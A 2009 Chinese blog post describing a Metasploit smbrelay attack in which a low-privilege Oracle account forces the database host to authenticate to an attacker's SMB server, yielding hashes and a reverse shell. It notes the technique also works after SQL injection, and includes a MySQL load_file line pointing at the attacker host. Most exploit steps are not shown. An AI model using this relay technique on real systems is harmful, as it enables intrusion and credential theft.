Oracle 低权限数据库账户得到 OS 访问权限 提权利用

 更新时间:2009年06月13日 19:59:08   作者:  
大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问权限。

这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问权限。我本地测试了下,还真的成功了。:-)

具体的原理分析看原文吧,我这里把我的测试过程写出来.

我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0,服务启动权限为 administrator,数据库账户用的是 dbsnmp 账户的默认权限.0

1.先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo /etc/init.d/samba stop<p>1

2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.

2

3

3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect和 resource 权限。

4.然后执行下面 3 条 SQL 语句

 

5

6

7

后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。

这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。

两个PDF下载,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。

相关文章

  • Oracle安装卸载图文教程详解

    Oracle安装卸载图文教程详解

    这篇文章主要为大家介绍了Oracle安装卸载的详细图文教程,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2017-08-08
  • Oracle最新面试题及答案整理大全

    Oracle最新面试题及答案整理大全

    好久没有给大家发面试题了,最近收集了一套Oracle的面试题,特地整理出来分享给大家,这篇文章主要给大家介绍了关于Oracle最新面试题及答案整理大全的相关资料,文中通过代码介绍的非常详细,需要的朋友可以参考下
    2024-06-06
  • Oracle(90)数据库如何创建用户(User)

    Oracle(90)数据库如何创建用户(User)

    这篇文章主要介绍了在Oracle数据库中创建用户的过程,包括连接到数据库、创建用户、分配权限、分配表空间和设置账户状态,提供了详细的步骤和代码示例,文中通过代码介绍的非常详细,需要的朋友可以参考下
    2024-12-12
  • Oracle字符函数应用检测汉字的方法

    Oracle字符函数应用检测汉字的方法

    这篇文章主要介绍了Oracle字符函数应用检测汉字的方法,需要的朋友可以参考下
    2017-03-03
  • Oracle数据库中字符串截取最全方法总结

    Oracle数据库中字符串截取最全方法总结

    Oracle提供了多种截取字符串的操作方法,可以根据具体需求选择合适的方法进行操作,下面这篇文章主要给大家总结介绍了关于Oracle数据库中字符串截取的最全方法,需要的朋友可以参考下
    2024-03-03
  • 在Oracle网络结构解决连接问题

    在Oracle网络结构解决连接问题

    在Oracle网络结构解决连接问题...
    2007-03-03
  • oracle中all、any函数用法与区别说明

    oracle中all、any函数用法与区别说明

    在Oracle中,any()表示括号内任何一个条件,只要有一个满足即可;而all()表示所有的条件都满足才可以
    2023-04-04
  • Oracle执行计划查看方法汇总及优劣对比详解

    Oracle执行计划查看方法汇总及优劣对比详解

    这篇文章主要介绍了Oracle执行计划查看方法汇总及优劣对比,在 Oracle 数据库中,查看执行计划是优化 SQL 语句性能的重要工具,本文给大家介绍了几种常用的查看执行计划的方法及其优劣比较,需要的朋友可以参考下
    2024-11-11
  • Oracle 中生成流水号的方法

    Oracle 中生成流水号的方法

    这篇文章主要介绍了Oracle 中生成流水号的方法 的相关资料,需要的朋友可以参考下
    2016-06-06
  • Oracle提高SQL执行效率的3种方法

    Oracle提高SQL执行效率的3种方法

    Oracle提供了多种方法在执行带有大量执行计划的复杂查询时剖析过程会拖累系统的性能,感兴趣的朋友可以了解下
    2013-09-09

最新评论